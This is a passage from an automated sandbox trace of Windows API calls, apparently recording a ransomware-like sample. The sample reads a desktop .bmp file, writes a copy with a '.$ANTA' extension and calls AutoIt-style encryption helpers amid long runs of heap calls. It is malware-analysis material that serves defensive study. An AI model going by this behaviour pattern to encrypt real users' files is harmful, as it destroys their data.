hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0125.279] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0125.279] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0125.280] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\od9honyv uw0iij2du.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0125.280] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.280] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.280] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0125.280] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.281] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.281] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\od9honyv uw0iij2du.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.323] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0125.323] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.326] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0125.326] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x86e3, lpOverlapped=0x0) returned 1 [0125.328] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0125.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x86e3) returned 0x49aa010 [0125.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x86e3) returned 0x49b2700 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.332] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x86e3) returned 0x49aa010 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.333] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0125.333] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0125.333] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0125.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x86e3) returned 0x49aa010 [0125.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0125.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x86e3) returned 0x49badf0 [0125.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0125.335] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0125.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0125.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0125.335] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0125.336] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0125.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0125.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: 